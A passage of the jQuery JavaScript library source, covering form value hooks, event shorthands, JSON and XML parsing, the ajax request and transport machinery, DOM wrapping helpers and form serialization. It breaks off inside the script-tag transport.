			if ( val == null ) {
				val = "";

			} else if ( typeof val === "number" ) {
				val += "";

			} else if ( jQuery.isArray( val ) ) {
				val = jQuery.map( val, function( value ) {
					return value == null ? "" : value + "";
				});
			}

			hooks = jQuery.valHooks[ this.type ] || jQuery.valHooks[ this.nodeName.toLowerCase() ];

			// If set returns undefined, fall back to normal setting
			if ( !hooks || !("set" in hooks) || hooks.set( this, val, "value" ) === undefined ) {
				this.value = val;
			}
		});
	}
});

jQuery.extend({
	valHooks: {
		option: {
			get: function( elem ) {
				var val = jQuery.find.attr( elem, "value" );
				return val != null ?
					val :
					// Support: IE10-11+
					// option.text throws exceptions (#14686, #14858)
					jQuery.trim( jQuery.text( elem ) );
			}
		},
		select: {
			get: function( elem ) {
				var value, option,
					options = elem.options,
					index = elem.selectedIndex,
					one = elem.type === "select-one" || index < 0,
					values = one ? null : [],
					max = one ? index + 1 : options.length,
					i = index < 0 ?
						max :
						one ? index : 0;

				// Loop through all the selected options
				for ( ; i < max; i++ ) {
					option = options[ i ];

					// IE6-9 doesn't update selected after form reset (#2551)
					if ( ( option.selected || i === index ) &&
							// Don't return options that are disabled or in a disabled optgroup
							( support.optDisabled ? !option.disabled : option.getAttribute( "disabled" ) === null ) &&
							( !option.parentNode.disabled || !jQuery.nodeName( option.parentNode, "optgroup" ) ) ) {

						// Get the specific value for the option
						value = jQuery( option ).val();

						// We don't need an array for one selects
						if ( one ) {
							return value;
						}

						// Multi-Selects return an array
						values.push( value );
					}
				}

				return values;
			},

			set: function( elem, value ) {
				var optionSet, option,
					options = elem.options,
					values = jQuery.makeArray( value ),
					i = options.length;

				while ( i-- ) {
					option = options[ i ];
					if ( (option.selected = jQuery.inArray( option.value, values ) >= 0) ) {
						optionSet = true;
					}
				}

				// Force browsers to behave consistently when non-matching value is set
				if ( !optionSet ) {
					elem.selectedIndex = -1;
				}
				return values;
			}
		}
	}
});

// Radios and checkboxes getter/setter
jQuery.each([ "radio", "checkbox" ], function() {
	jQuery.valHooks[ this ] = {
		set: function( elem, value ) {
			if ( jQuery.isArray( value ) ) {
				return ( elem.checked = jQuery.inArray( jQuery(elem).val(), value ) >= 0 );
			}
		}
	};
	if ( !support.checkOn ) {
		jQuery.valHooks[ this ].get = function( elem ) {
			return elem.getAttribute("value") === null ? "on" : elem.value;
		};
	}
});




// Return jQuery for attributes-only inclusion


jQuery.each( ("blur focus focusin focusout load resize scroll unload click dblclick " +
	"mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave " +
	"change select submit keydown keypress keyup error contextmenu").split(" "), function( i, name ) {

	// Handle event binding
	jQuery.fn[ name ] = function( data, fn ) {
		return arguments.length > 0 ?
			this.on( name, null, data, fn ) :
			this.trigger( name );
	};
});

jQuery.fn.extend({
	hover: function( fnOver, fnOut ) {
		return this.mouseenter( fnOver ).mouseleave( fnOut || fnOver );
	},

	bind: function( types, data, fn ) {
		return this.on( types, null, data, fn );
	},
	unbind: function( types, fn ) {
		return this.off( types, null, fn );
	},

	delegate: function( selector, types, data, fn ) {
		return this.on( types, selector, data, fn );
	},
	undelegate: function( selector, types, fn ) {
		// ( namespace ) or ( selector, types [, fn] )
		return arguments.length === 1 ? this.off( selector, "**" ) : this.off( types, selector || "**", fn );
	}
});


var nonce = jQuery.now();

var rquery = (/\?/);



// Support: Android 2.3
// Workaround failure to string-cast null input
jQuery.parseJSON = function( data ) {
	return JSON.parse( data + "" );
};


// Cross-browser xml parsing
jQuery.parseXML = function( data ) {
	var xml, tmp;
	if ( !data || typeof data !== "string" ) {
		return null;
	}

	// Support: IE9
	try {
		tmp = new DOMParser();
		xml = tmp.parseFromString( data, "text/xml" );
	} catch ( e ) {
		xml = undefined;
	}

	if ( !xml || xml.getElementsByTagName( "parsererror" ).length ) {
		jQuery.error( "Invalid XML: " + data );
	}
	return xml;
};


var
	rhash = /#.*$/,
	rts = /([?&])_=[^&]*/,
	rheaders = /^(.*?):[ \t]*([^\r\n]*)$/mg,
	// #7653, #8125, #8152: local protocol detection
	rlocalProtocol = /^(?:about|app|app-storage|.+-extension|file|res|widget):$/,
	rnoContent = /^(?:GET|HEAD)$/,
	rprotocol = /^\/\//,
	rurl = /^([\w.+-]+:)(?:\/\/(?:[^\/?#]*@|)([^\/?#:]*)(?::(\d+)|)|)/,

	/* Prefilters
	 * 1) They are useful to introduce custom dataTypes (see ajax/jsonp.js for an example)
	 * 2) These are called:
	 *    - BEFORE asking for a transport
	 *    - AFTER param serialization (s.data is a string if s.processData is true)
	 * 3) key is the dataType
	 * 4) the catchall symbol "*" can be used
	 * 5) execution will start with transport dataType and THEN continue down to "*" if needed
	 */
	prefilters = {},

	/* Transports bindings
	 * 1) key is the dataType
	 * 2) the catchall symbol "*" can be used
	 * 3) selection will start with transport dataType and THEN go to "*" if needed
	 */
	transports = {},

	// Avoid comment-prolog char sequence (#10098); must appease lint and evade compression
	allTypes = "*/".concat( "*" ),

	// Document location
	ajaxLocation = window.location.href,

	// Segment location into parts
	ajaxLocParts = rurl.exec( ajaxLocation.toLowerCase() ) || [];

// Base "constructor" for jQuery.ajaxPrefilter and jQuery.ajaxTransport
function addToPrefiltersOrTransports( structure ) {

	// dataTypeExpression is optional and defaults to "*"
	return function( dataTypeExpression, func ) {

		if ( typeof dataTypeExpression !== "string" ) {
			func = dataTypeExpression;
			dataTypeExpression = "*";
		}

		var dataType,
			i = 0,
			dataTypes = dataTypeExpression.toLowerCase().match( rnotwhite ) || [];

		if ( jQuery.isFunction( func ) ) {
			// For each dataType in the dataTypeExpression
			while ( (dataType = dataTypes[i++]) ) {
				// Prepend if requested
				if ( dataType[0] === "+" ) {
					dataType = dataType.slice( 1 ) || "*";
					(structure[ dataType ] = structure[ dataType ] || []).unshift( func );

				// Otherwise append
				} else {
					(structure[ dataType ] = structure[ dataType ] || []).push( func );
				}
			}
		}
	};
}

// Base inspection function for prefilters and transports
function inspectPrefiltersOrTransports( structure, options, originalOptions, jqXHR ) {

	var inspected = {},
		seekingTransport = ( structure === transports );

	function inspect( dataType ) {
		var selected;
		inspected[ dataType ] = true;
		jQuery.each( structure[ dataType ] || [], function( _, prefilterOrFactory ) {
			var dataTypeOrTransport = prefilterOrFactory( options, originalOptions, jqXHR );
			if ( typeof dataTypeOrTransport === "string" && !seekingTransport && !inspected[ dataTypeOrTransport ] ) {
				options.dataTypes.unshift( dataTypeOrTransport );
				inspect( dataTypeOrTransport );
				return false;
			} else if ( seekingTransport ) {
				return !( selected = dataTypeOrTransport );
			}
		});
		return selected;
	}

	return inspect( options.dataTypes[ 0 ] ) || !inspected[ "*" ] && inspect( "*" );
}

// A special extend for ajax options
// that takes "flat" options (not to be deep extended)
// Fixes #9887
function ajaxExtend( target, src ) {
	var key, deep,
		flatOptions = jQuery.ajaxSettings.flatOptions || {};

	for ( key in src ) {
		if ( src[ key ] !== undefined ) {
			( flatOptions[ key ] ? target : ( deep || (deep = {}) ) )[ key ] = src[ key ];
		}
	}
	if ( deep ) {
		jQuery.extend( true, target, deep );
	}

	return target;
}

/* Handles responses to an ajax request:
 * - finds the right dataType (mediates between content-type and expected dataType)
 * - returns the corresponding response
 */
function ajaxHandleResponses( s, jqXHR, responses ) {

	var ct, type, finalDataType, firstDataType,
		contents = s.contents,
		dataTypes = s.dataTypes;

	// Remove auto dataType and get content-type in the process
	while ( dataTypes[ 0 ] === "*" ) {
		dataTypes.shift();
		if ( ct === undefined ) {
			ct = s.mimeType || jqXHR.getResponseHeader("Content-Type");
		}
	}

	// Check if we're dealing with a known content-type
	if ( ct ) {
		for ( type in contents ) {
			if ( contents[ type ] && contents[ type ].test( ct ) ) {
				dataTypes.unshift( type );
				break;
			}
		}
	}

	// Check to see if we have a response for the expected dataType
	if ( dataTypes[ 0 ] in responses ) {
		finalDataType = dataTypes[ 0 ];
	} else {
		// Try convertible dataTypes
		for ( type in responses ) {
			if ( !dataTypes[ 0 ] || s.converters[ type + " " + dataTypes[0] ] ) {
				finalDataType = type;
				break;
			}
			if ( !firstDataType ) {
				firstDataType = type;
			}
		}
		// Or just use first one
		finalDataType = finalDataType || firstDataType;
	}

	// If we found a dataType
	// We add the dataType to the list if needed
	// and return the corresponding response
	if ( finalDataType ) {
		if ( finalDataType !== dataTypes[ 0 ] ) {
			dataTypes.unshift( finalDataType );
		}
		return responses[ finalDataType ];
	}
}

/* Chain conversions given the request and the original response
 * Also sets the responseXXX fields on the jqXHR instance
 */
function ajaxConvert( s, response, jqXHR, isSuccess ) {
	var conv2, current, conv, tmp, prev,
		converters = {},
		// Work with a copy of dataTypes in case we need to modify it for conversion
		dataTypes = s.dataTypes.slice();

	// Create converters map with lowercased keys
	if ( dataTypes[ 1 ] ) {
		for ( conv in s.converters ) {
			converters[ conv.toLowerCase() ] = s.converters[ conv ];
		}
	}

	current = dataTypes.shift();

	// Convert to each sequential dataType
	while ( current ) {

		if ( s.responseFields[ current ] ) {
			jqXHR[ s.responseFields[ current ] ] = response;
		}

		// Apply the dataFilter if provided
		if ( !prev && isSuccess && s.dataFilter ) {
			response = s.dataFilter( response, s.dataType );
		}

		prev = current;
		current = dataTypes.shift();

		if ( current ) {

		// There's only work to do if current dataType is non-auto
			if ( current === "*" ) {

				current = prev;

			// Convert response if prev dataType is non-auto and differs from current
			} else if ( prev !== "*" && prev !== current ) {

				// Seek a direct converter
				conv = converters[ prev + " " + current ] || converters[ "* " + current ];

				// If none found, seek a pair
				if ( !conv ) {
					for ( conv2 in converters ) {

						// If conv2 outputs current
						tmp = conv2.split( " " );
						if ( tmp[ 1 ] === current ) {

							// If prev can be converted to accepted input
							conv = converters[ prev + " " + tmp[ 0 ] ] ||
								converters[ "* " + tmp[ 0 ] ];
							if ( conv ) {
								// Condense equivalence converters
								if ( conv === true ) {
									conv = converters[ conv2 ];

								// Otherwise, insert the intermediate dataType
								} else if ( converters[ conv2 ] !== true ) {
									current = tmp[ 0 ];
									dataTypes.unshift( tmp[ 1 ] );
								}
								break;
							}
						}
					}
				}

				// Apply converter (if not an equivalence)
				if ( conv !== true ) {

					// Unless errors are allowed to bubble, catch and return them
					if ( conv && s[ "throws" ] ) {
						response = conv( response );
					} else {
						try {
							response = conv( response );
						} catch ( e ) {
							return { state: "parsererror", error: conv ? e : "No conversion from " + prev + " to " + current };
						}
					}
				}
			}
		}
	}

	return { state: "success", data: response };
}

jQuery.extend({

	// Counter for holding the number of active queries
	active: 0,

	// Last-Modified header cache for next request
	lastModified: {},
	etag: {},

	ajaxSettings: {
		url: ajaxLocation,
		type: "GET",
		isLocal: rlocalProtocol.test( ajaxLocParts[ 1 ] ),
		global: true,
		processData: true,
		async: true,
		contentType: "application/x-www-form-urlencoded; charset=UTF-8",
		/*
		timeout: 0,
		data: null,
		dataType: null,
		username: null,
		password: null,
		cache: null,
		throws: false,
		traditional: false,
		headers: {},
		*/

		accepts: {
			"*": allTypes,
			text: "text/plain",
			html: "text/html",
			xml: "application/xml, text/xml",
			json: "application/json, text/javascript"
		},

		contents: {
			xml: /xml/,
			html: /html/,
			json: /json/
		},

		responseFields: {
			xml: "responseXML",
			text: "responseText",
			json: "responseJSON"
		},

		// Data converters
		// Keys separate source (or catchall "*") and destination types with a single space
		converters: {

			// Convert anything to text
			"* text": String,

			// Text to html (true = no transformation)
			"text html": true,

			// Evaluate text as a json expression
			"text json": jQuery.parseJSON,

			// Parse text as xml
			"text xml": jQuery.parseXML
		},

		// For options that shouldn't be deep extended:
		// you can add your own custom options here if
		// and when you create one that shouldn't be
		// deep extended (see ajaxExtend)
		flatOptions: {
			url: true,
			context: true
		}
	},

	// Creates a full fledged settings object into target
	// with both ajaxSettings and settings fields.
	// If target is omitted, writes into ajaxSettings.
	ajaxSetup: function( target, settings ) {
		return settings ?

			// Building a settings object
			ajaxExtend( ajaxExtend( target, jQuery.ajaxSettings ), settings ) :

			// Extending ajaxSettings
			ajaxExtend( jQuery.ajaxSettings, target );
	},

	ajaxPrefilter: addToPrefiltersOrTransports( prefilters ),
	ajaxTransport: addToPrefiltersOrTransports( transports ),

	// Main method
	ajax: function( url, options ) {

		// If url is an object, simulate pre-1.5 signature
		if ( typeof url === "object" ) {
			options = url;
			url = undefined;
		}

		// Force options to be an object
		options = options || {};

		var transport,
			// URL without anti-cache param
			cacheURL,
			// Response headers
			responseHeadersString,
			responseHeaders,
			// timeout handle
			timeoutTimer,
			// Cross-domain detection vars
			parts,
			// To know if global events are to be dispatched
			fireGlobals,
			// Loop variable
			i,
			// Create the final options object
			s = jQuery.ajaxSetup( {}, options ),
			// Callbacks context
			callbackContext = s.context || s,
			// Context for global events is callbackContext if it is a DOM node or jQuery collection
			globalEventContext = s.context && ( callbackContext.nodeType || callbackContext.jquery ) ?
				jQuery( callbackContext ) :
				jQuery.event,
			// Deferreds
			deferred = jQuery.Deferred(),
			completeDeferred = jQuery.Callbacks("once memory"),
			// Status-dependent callbacks
			statusCode = s.statusCode || {},
			// Headers (they are sent all at once)
			requestHeaders = {},
			requestHeadersNames = {},
			// The jqXHR state
			state = 0,
			// Default abort message
			strAbort = "canceled",
			// Fake xhr
			jqXHR = {
				readyState: 0,

				// Builds headers hashtable if needed
				getResponseHeader: function( key ) {
					var match;
					if ( state === 2 ) {
						if ( !responseHeaders ) {
							responseHeaders = {};
							while ( (match = rheaders.exec( responseHeadersString )) ) {
								responseHeaders[ match[1].toLowerCase() ] = match[ 2 ];
							}
						}
						match = responseHeaders[ key.toLowerCase() ];
					}
					return match == null ? null : match;
				},

				// Raw string
				getAllResponseHeaders: function() {
					return state === 2 ? responseHeadersString : null;
				},

				// Caches the header
				setRequestHeader: function( name, value ) {
					var lname = name.toLowerCase();
					if ( !state ) {
						name = requestHeadersNames[ lname ] = requestHeadersNames[ lname ] || name;
						requestHeaders[ name ] = value;
					}
					return this;
				},

				// Overrides response content-type header
				overrideMimeType: function( type ) {
					if ( !state ) {
						s.mimeType = type;
					}
					return this;
				},

				// Status-dependent callbacks
				statusCode: function( map ) {
					var code;
					if ( map ) {
						if ( state < 2 ) {
							for ( code in map ) {
								// Lazy-add the new callback in a way that preserves old ones
								statusCode[ code ] = [ statusCode[ code ], map[ code ] ];
							}
						} else {
							// Execute the appropriate callbacks
							jqXHR.always( map[ jqXHR.status ] );
						}
					}
					return this;
				},

				// Cancel the request
				abort: function( statusText ) {
					var finalText = statusText || strAbort;
					if ( transport ) {
						transport.abort( finalText );
					}
					done( 0, finalText );
					return this;
				}
			};

		// Attach deferreds
		deferred.promise( jqXHR ).complete = completeDeferred.add;
		jqXHR.success = jqXHR.done;
		jqXHR.error = jqXHR.fail;

		// Remove hash character (#7531: and string promotion)
		// Add protocol if not provided (prefilters might expect it)
		// Handle falsy url in the settings object (#10093: consistency with old signature)
		// We also use the url parameter if available
		s.url = ( ( url || s.url || ajaxLocation ) + "" ).replace( rhash, "" )
			.replace( rprotocol, ajaxLocParts[ 1 ] + "//" );

		// Alias method option to type as per ticket #12004
		s.type = options.method || options.type || s.method || s.type;

		// Extract dataTypes list
		s.dataTypes = jQuery.trim( s.dataType || "*" ).toLowerCase().match( rnotwhite ) || [ "" ];

		// A cross-domain request is in order when we have a protocol:host:port mismatch
		if ( s.crossDomain == null ) {
			parts = rurl.exec( s.url.toLowerCase() );
			s.crossDomain = !!( parts &&
				( parts[ 1 ] !== ajaxLocParts[ 1 ] || parts[ 2 ] !== ajaxLocParts[ 2 ] ||
					( parts[ 3 ] || ( parts[ 1 ] === "http:" ? "80" : "443" ) ) !==
						( ajaxLocParts[ 3 ] || ( ajaxLocParts[ 1 ] === "http:" ? "80" : "443" ) ) )
			);
		}

		// Convert data if not already a string
		if ( s.data && s.processData && typeof s.data !== "string" ) {
			s.data = jQuery.param( s.data, s.traditional );
		}

		// Apply prefilters
		inspectPrefiltersOrTransports( prefilters, s, options, jqXHR );

		// If request was aborted inside a prefilter, stop there
		if ( state === 2 ) {
			return jqXHR;
		}

		// We can fire global events as of now if asked to
		// Don't fire events if jQuery.event is undefined in an AMD-usage scenario (#15118)
		fireGlobals = jQuery.event && s.global;

		// Watch for a new set of requests
		if ( fireGlobals && jQuery.active++ === 0 ) {
			jQuery.event.trigger("ajaxStart");
		}

		// Uppercase the type
		s.type = s.type.toUpperCase();

		// Determine if request has content
		s.hasContent = !rnoContent.test( s.type );

		// Save the URL in case we're toying with the If-Modified-Since
		// and/or If-None-Match header later on
		cacheURL = s.url;

		// More options handling for requests with no content
		if ( !s.hasContent ) {

			// If data is available, append data to url
			if ( s.data ) {
				cacheURL = ( s.url += ( rquery.test( cacheURL ) ? "&" : "?" ) + s.data );
				// #9682: remove data so that it's not used in an eventual retry
				delete s.data;
			}

			// Add anti-cache in url if needed
			if ( s.cache === false ) {
				s.url = rts.test( cacheURL ) ?

					// If there is already a '_' parameter, set its value
					cacheURL.replace( rts, "$1_=" + nonce++ ) :

					// Otherwise add one to the end
					cacheURL + ( rquery.test( cacheURL ) ? "&" : "?" ) + "_=" + nonce++;
			}
		}

		// Set the If-Modified-Since and/or If-None-Match header, if in ifModified mode.
		if ( s.ifModified ) {
			if ( jQuery.lastModified[ cacheURL ] ) {
				jqXHR.setRequestHeader( "If-Modified-Since", jQuery.lastModified[ cacheURL ] );
			}
			if ( jQuery.etag[ cacheURL ] ) {
				jqXHR.setRequestHeader( "If-None-Match", jQuery.etag[ cacheURL ] );
			}
		}

		// Set the correct header, if data is being sent
		if ( s.data && s.hasContent && s.contentType !== false || options.contentType ) {
			jqXHR.setRequestHeader( "Content-Type", s.contentType );
		}

		// Set the Accepts header for the server, depending on the dataType
		jqXHR.setRequestHeader(
			"Accept",
			s.dataTypes[ 0 ] && s.accepts[ s.dataTypes[0] ] ?
				s.accepts[ s.dataTypes[0] ] + ( s.dataTypes[ 0 ] !== "*" ? ", " + allTypes + "; q=0.01" : "" ) :
				s.accepts[ "*" ]
		);

		// Check for headers option
		for ( i in s.headers ) {
			jqXHR.setRequestHeader( i, s.headers[ i ] );
		}

		// Allow custom headers/mimetypes and early abort
		if ( s.beforeSend && ( s.beforeSend.call( callbackContext, jqXHR, s ) === false || state === 2 ) ) {
			// Abort if not done already and return
			return jqXHR.abort();
		}

		// Aborting is no longer a cancellation
		strAbort = "abort";

		// Install callbacks on deferreds
		for ( i in { success: 1, error: 1, complete: 1 } ) {
			jqXHR[ i ]( s[ i ] );
		}

		// Get transport
		transport = inspectPrefiltersOrTransports( transports, s, options, jqXHR );

		// If no transport, we auto-abort
		if ( !transport ) {
			done( -1, "No Transport" );
		} else {
			jqXHR.readyState = 1;

			// Send global event
			if ( fireGlobals ) {
				globalEventContext.trigger( "ajaxSend", [ jqXHR, s ] );
			}
			// Timeout
			if ( s.async && s.timeout > 0 ) {
				timeoutTimer = setTimeout(function() {
					jqXHR.abort("timeout");
				}, s.timeout );
			}

			try {
				state = 1;
				transport.send( requestHeaders, done );
			} catch ( e ) {
				// Propagate exception as error if not done
				if ( state < 2 ) {
					done( -1, e );
				// Simply rethrow otherwise
				} else {
					throw e;
				}
			}
		}

		// Callback for when everything is done
		function done( status, nativeStatusText, responses, headers ) {
			var isSuccess, success, error, response, modified,
				statusText = nativeStatusText;

			// Called once
			if ( state === 2 ) {
				return;
			}

			// State is "done" now
			state = 2;

			// Clear timeout if it exists
			if ( timeoutTimer ) {
				clearTimeout( timeoutTimer );
			}

			// Dereference transport for early garbage collection
			// (no matter how long the jqXHR object will be used)
			transport = undefined;

			// Cache response headers
			responseHeadersString = headers || "";

			// Set readyState
			jqXHR.readyState = status > 0 ? 4 : 0;

			// Determine if successful
			isSuccess = status >= 200 && status < 300 || status === 304;

			// Get response data
			if ( responses ) {
				response = ajaxHandleResponses( s, jqXHR, responses );
			}

			// Convert no matter what (that way responseXXX fields are always set)
			response = ajaxConvert( s, response, jqXHR, isSuccess );

			// If successful, handle type chaining
			if ( isSuccess ) {

				// Set the If-Modified-Since and/or If-None-Match header, if in ifModified mode.
				if ( s.ifModified ) {
					modified = jqXHR.getResponseHeader("Last-Modified");
					if ( modified ) {
						jQuery.lastModified[ cacheURL ] = modified;
					}
					modified = jqXHR.getResponseHeader("etag");
					if ( modified ) {
						jQuery.etag[ cacheURL ] = modified;
					}
				}

				// if no content
				if ( status === 204 || s.type === "HEAD" ) {
					statusText = "nocontent";

				// if not modified
				} else if ( status === 304 ) {
					statusText = "notmodified";

				// If we have data, let's convert it
				} else {
					statusText = response.state;
					success = response.data;
					error = response.error;
					isSuccess = !error;
				}
			} else {
				// Extract error from statusText and normalize for non-aborts
				error = statusText;
				if ( status || !statusText ) {
					statusText = "error";
					if ( status < 0 ) {
						status = 0;
					}
				}
			}

			// Set data for the fake xhr object
			jqXHR.status = status;
			jqXHR.statusText = ( nativeStatusText || statusText ) + "";

			// Success/Error
			if ( isSuccess ) {
				deferred.resolveWith( callbackContext, [ success, statusText, jqXHR ] );
			} else {
				deferred.rejectWith( callbackContext, [ jqXHR, statusText, error ] );
			}

			// Status-dependent callbacks
			jqXHR.statusCode( statusCode );
			statusCode = undefined;

			if ( fireGlobals ) {
				globalEventContext.trigger( isSuccess ? "ajaxSuccess" : "ajaxError",
					[ jqXHR, s, isSuccess ? success : error ] );
			}

			// Complete
			completeDeferred.fireWith( callbackContext, [ jqXHR, statusText ] );

			if ( fireGlobals ) {
				globalEventContext.trigger( "ajaxComplete", [ jqXHR, s ] );
				// Handle the global AJAX counter
				if ( !( --jQuery.active ) ) {
					jQuery.event.trigger("ajaxStop");
				}
			}
		}

		return jqXHR;
	},

	getJSON: function( url, data, callback ) {
		return jQuery.get( url, data, callback, "json" );
	},

	getScript: function( url, callback ) {
		return jQuery.get( url, undefined, callback, "script" );
	}
});

jQuery.each( [ "get", "post" ], function( i, method ) {
	jQuery[ method ] = function( url, data, callback, type ) {
		// Shift arguments if data argument was omitted
		if ( jQuery.isFunction( data ) ) {
			type = type || callback;
			callback = data;
			data = undefined;
		}

		return jQuery.ajax({
			url: url,
			type: method,
			dataType: type,
			data: data,
			success: callback
		});
	};
});


jQuery._evalUrl = function( url ) {
	return jQuery.ajax({
		url: url,
		type: "GET",
		dataType: "script",
		async: false,
		global: false,
		"throws": true
	});
};


jQuery.fn.extend({
	wrapAll: function( html ) {
		var wrap;

		if ( jQuery.isFunction( html ) ) {
			return this.each(function( i ) {
				jQuery( this ).wrapAll( html.call(this, i) );
			});
		}

		if ( this[ 0 ] ) {

			// The elements to wrap the target around
			wrap = jQuery( html, this[ 0 ].ownerDocument ).eq( 0 ).clone( true );

			if ( this[ 0 ].parentNode ) {
				wrap.insertBefore( this[ 0 ] );
			}

			wrap.map(function() {
				var elem = this;

				while ( elem.firstElementChild ) {
					elem = elem.firstElementChild;
				}

				return elem;
			}).append( this );
		}

		return this;
	},

	wrapInner: function( html ) {
		if ( jQuery.isFunction( html ) ) {
			return this.each(function( i ) {
				jQuery( this ).wrapInner( html.call(this, i) );
			});
		}

		return this.each(function() {
			var self = jQuery( this ),
				contents = self.contents();

			if ( contents.length ) {
				contents.wrapAll( html );

			} else {
				self.append( html );
			}
		});
	},

	wrap: function( html ) {
		var isFunction = jQuery.isFunction( html );

		return this.each(function( i ) {
			jQuery( this ).wrapAll( isFunction ? html.call(this, i) : html );
		});
	},

	unwrap: function() {
		return this.parent().each(function() {
			if ( !jQuery.nodeName( this, "body" ) ) {
				jQuery( this ).replaceWith( this.childNodes );
			}
		}).end();
	}
});


jQuery.expr.filters.hidden = function( elem ) {
	// Support: Opera <= 12.12
	// Opera reports offsetWidths and offsetHeights less than zero on some elements
	return elem.offsetWidth <= 0 && elem.offsetHeight <= 0;
};
jQuery.expr.filters.visible = function( elem ) {
	return !jQuery.expr.filters.hidden( elem );
};




var r20 = /%20/g,
	rbracket = /\[\]$/,
	rCRLF = /\r?\n/g,
	rsubmitterTypes = /^(?:submit|button|image|reset|file)$/i,
	rsubmittable = /^(?:input|select|textarea|keygen)/i;

function buildParams( prefix, obj, traditional, add ) {
	var name;

	if ( jQuery.isArray( obj ) ) {
		// Serialize array item.
		jQuery.each( obj, function( i, v ) {
			if ( traditional || rbracket.test( prefix ) ) {
				// Treat each array item as a scalar.
				add( prefix, v );

			} else {
				// Item is non-scalar (array or object), encode its numeric index.
				buildParams( prefix + "[" + ( typeof v === "object" ? i : "" ) + "]", v, traditional, add );
			}
		});

	} else if ( !traditional && jQuery.type( obj ) === "object" ) {
		// Serialize object item.
		for ( name in obj ) {
			buildParams( prefix + "[" + name + "]", obj[ name ], traditional, add );
		}

	} else {
		// Serialize scalar item.
		add( prefix, obj );
	}
}

// Serialize an array of form elements or a set of
// key/values into a query string
jQuery.param = function( a, traditional ) {
	var prefix,
		s = [],
		add = function( key, value ) {
			// If value is a function, invoke it and return its value
			value = jQuery.isFunction( value ) ? value() : ( value == null ? "" : value );
			s[ s.length ] = encodeURIComponent( key ) + "=" + encodeURIComponent( value );
		};

	// Set traditional to true for jQuery <= 1.3.2 behavior.
	if ( traditional === undefined ) {
		traditional = jQuery.ajaxSettings && jQuery.ajaxSettings.traditional;
	}

	// If an array was passed in, assume that it is an array of form elements.
	if ( jQuery.isArray( a ) || ( a.jquery && !jQuery.isPlainObject( a ) ) ) {
		// Serialize the form elements
		jQuery.each( a, function() {
			add( this.name, this.value );
		});

	} else {
		// If traditional, encode the "old" way (the way 1.3.2 or older
		// did it), otherwise encode params recursively.
		for ( prefix in a ) {
			buildParams( prefix, a[ prefix ], traditional, add );
		}
	}

	// Return the resulting serialization
	return s.join( "&" ).replace( r20, "+" );
};

jQuery.fn.extend({
	serialize: function() {
		return jQuery.param( this.serializeArray() );
	},
	serializeArray: function() {
		return this.map(function() {
			// Can add propHook for "elements" to filter or add form elements
			var elements = jQuery.prop( this, "elements" );
			return elements ? jQuery.makeArray( elements ) : this;
		})
		.filter(function() {
			var type = this.type;

			// Use .is( ":disabled" ) so that fieldset[disabled] works
			return this.name && !jQuery( this ).is( ":disabled" ) &&
				rsubmittable.test( this.nodeName ) && !rsubmitterTypes.test( type ) &&
				( this.checked || !rcheckableType.test( type ) );
		})
		.map(function( i, elem ) {
			var val = jQuery( this ).val();

			return val == null ?
				null :
				jQuery.isArray( val ) ?
					jQuery.map( val, function( val ) {
						return { name: elem.name, value: val.replace( rCRLF, "\r\n" ) };
					}) :
					{ name: elem.name, value: val.replace( rCRLF, "\r\n" ) };
		}).get();
	}
});


jQuery.ajaxSettings.xhr = function() {
	try {
		return new XMLHttpRequest();
	} catch( e ) {}
};

var xhrId = 0,
	xhrCallbacks = {},
	xhrSuccessStatus = {
		// file protocol always yields status code 0, assume 200
		0: 200,
		// Support: IE9
		// #1450: sometimes IE returns 1223 when it should be 204
		1223: 204
	},
	xhrSupported = jQuery.ajaxSettings.xhr();

// Support: IE9
// Open requests must be manually aborted on unload (#5280)
// See https://support.microsoft.com/kb/2856746 for more info
if ( window.attachEvent ) {
	window.attachEvent( "onunload", function() {
		for ( var key in xhrCallbacks ) {
			xhrCallbacks[ key ]();
		}
	});
}

support.cors = !!xhrSupported && ( "withCredentials" in xhrSupported );
support.ajax = xhrSupported = !!xhrSupported;

jQuery.ajaxTransport(function( options ) {
	var callback;

	// Cross domain only allowed if supported through XMLHttpRequest
	if ( support.cors || xhrSupported && !options.crossDomain ) {
		return {
			send: function( headers, complete ) {
				var i,
					xhr = options.xhr(),
					id = ++xhrId;

				xhr.open( options.type, options.url, options.async, options.username, options.password );

				// Apply custom fields if provided
				if ( options.xhrFields ) {
					for ( i in options.xhrFields ) {
						xhr[ i ] = options.xhrFields[ i ];
					}
				}

				// Override mime type if needed
				if ( options.mimeType && xhr.overrideMimeType ) {
					xhr.overrideMimeType( options.mimeType );
				}

				// X-Requested-With header
				// For cross-domain requests, seeing as conditions for a preflight are
				// akin to a jigsaw puzzle, we simply never set it to be sure.
				// (it can always be set on a per-request basis or even using ajaxSetup)
				// For same-domain requests, won't change header if already provided.
				if ( !options.crossDomain && !headers["X-Requested-With"] ) {
					headers["X-Requested-With"] = "XMLHttpRequest";
				}

				// Set headers
				for ( i in headers ) {
					xhr.setRequestHeader( i, headers[ i ] );
				}

				// Callback
				callback = function( type ) {
					return function() {
						if ( callback ) {
							delete xhrCallbacks[ id ];
							callback = xhr.onload = xhr.onerror = null;

							if ( type === "abort" ) {
								xhr.abort();
							} else if ( type === "error" ) {
								complete(
									// file: protocol always yields status 0; see #8605, #14207
									xhr.status,
									xhr.statusText
								);
							} else {
								complete(
									xhrSuccessStatus[ xhr.status ] || xhr.status,
									xhr.statusText,
									// Support: IE9
									// Accessing binary-data responseText throws an exception
									// (#11426)
									typeof xhr.responseText === "string" ? {
										text: xhr.responseText
									} : undefined,
									xhr.getAllResponseHeaders()
								);
							}
						}
					};
				};

				// Listen to events
				xhr.onload = callback();
				xhr.onerror = callback("error");

				// Create the abort callback
				callback = xhrCallbacks[ id ] = callback("abort");

				try {
					// Do send the request (this may raise an exception)
					xhr.send( options.hasContent && options.data || null );
				} catch ( e ) {
					// #14683: Only rethrow if this hasn't been notified as an error yet
					if ( callback ) {
						throw e;
					}
				}
			},

			abort: function() {
				if ( callback ) {
					callback();
				}
			}
		};
	}
});




// Install script dataType
jQuery.ajaxSetup({
	accepts: {
		script: "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"
	},
	contents: {
		script: /(?:java|ecma)script/
	},
	converters: {
		"text script": function( text ) {
			jQuery.globalEval( text );
			return text;
		}
	}
});

// Handle cache's special case and crossDomain
jQuery.ajaxPrefilter( "script", function( s ) {
	if ( s.cache === undefined ) {
		s.cache = false;
	}
	if ( s.crossDomain ) {
		s.type = "GET";
	}
});

// Bind script tag hack transport
jQuery.ajaxTransport( "script", function( s ) {
	// This transport only deals with cross domain requests
	if ( s.crossDomain ) {
		var script, callback;
		return {
			send: function( _, complete ) {
				script = jQuery("<script>").prop({
